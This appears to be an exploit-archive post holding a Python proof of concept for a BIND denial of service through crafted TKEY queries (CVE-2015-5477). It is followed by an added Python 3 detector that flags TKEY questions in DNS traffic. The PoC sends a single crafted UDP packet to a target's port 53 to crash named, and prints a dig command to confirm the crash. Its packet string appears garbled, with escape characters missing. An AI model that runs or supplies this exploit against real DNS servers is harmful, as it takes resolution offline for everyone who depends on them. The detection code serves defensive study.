BIND TKEY Query Denial Of Service
Posted on 04 August 2015

#!/usr/bin/python
# Title: BIND Remote DoS via TKEY queries
# aka: DNS TKEY Query of Death
# Author: Lorenzo Corsini <serdat>
# E-Mail: serdat5[at]gmail[dot]com
# Twitter: https://twitter.com/serdat5tm
# References:
# https://kb.isc.org/article/AA-01272
# https://www.isc.org/blogs/about-cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/

# Warning: there is no way to use this PoC in a non-disruptive manner.
# Use with care. I'm not responsible for what you'll do with that

import socket
import sys

#Not randomized.
DNS_PACKET='x04Xx00x80x00x01x00x01x00x00x00x01x03xxxx00x00xf9x00xffx03xxxx00x00xf9x00xffx00x00x00x00x00%x03xxxx00x00x00x00x00x00x00x00x00x00x03x00x00x00x10x10x10x10x10x10x10x10x10x10x10x10x10x10x10x10x10x00x00x03xxxx00x00x10x00xffx00x00x00x00x00%$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'

try:
    HOST=sys.argv[1]
    PORT= 53
except:
    print "Usage: %s host_to_crash" % sys.argv[0]
    sys.exit(-1)

print "Exploiting target at %s" % HOST
s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
s.sendto(DNS_PACKET,(HOST,PORT))
s.close()
print "Check Manually if the exploit worked... try launching:"
print "dig @%s CR4SH3D any" % HOST
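
Detection side, as an added example (Python 3, not part of the original post or of BIND): a parser for the question section of a UDP DNS payload that flags any question of type TKEY (249), the query type this PoC sends to port 53. It assumes the monitored server has no legitimate TKEY clients; the function names and sample packets are constructed for illustration.

```python
import struct

QTYPE_TKEY = 249  # RR type TKEY (RFC 2930)

def build_query(name, qtype, qclass=1, txid=0x1234):
    """Constructed sample input: a query with one question and no other records."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(p)]) + p.encode("ascii")
                     for p in name.split(".") if p) + b"\x00"
    return header + qname + struct.pack("!HH", qtype, qclass)

def parse_questions(payload):
    """Return [(qname, qtype, qclass)]; raise ValueError on a malformed payload."""
    if len(payload) < 12:
        raise ValueError("short DNS header")
    qdcount = struct.unpack("!H", payload[4:6])[0]
    off, questions = 12, []
    for _ in range(qdcount):
        labels = []
        while True:
            if off >= len(payload):
                raise ValueError("truncated name")
            length = payload[off]
            off += 1
            if length == 0:
                break
            # Pointers/reserved label types are not expected in a question name;
            # this example treats them as malformed rather than following them.
            if length & 0xC0 or off + length > len(payload):
                raise ValueError("bad label")
            labels.append(payload[off:off + length].decode("ascii", "replace"))
            off += length
        if off + 4 > len(payload):
            raise ValueError("truncated question")
        qtype, qclass = struct.unpack("!HH", payload[off:off + 4])
        off += 4
        questions.append((".".join(labels) or ".", qtype, qclass))
    return questions

def classify(payload):
    """'tkey' if any question asks for TKEY, 'malformed' if unparsable, else 'ok'."""
    try:
        questions = parse_questions(payload)
    except ValueError:
        return "malformed"
    return "tkey" if any(qt == QTYPE_TKEY for _, qt, _ in questions) else "ok"
```

Feed classify() the UDP payload of each packet addressed to port 53 and alert on "tkey"; "malformed" results are worth logging separately.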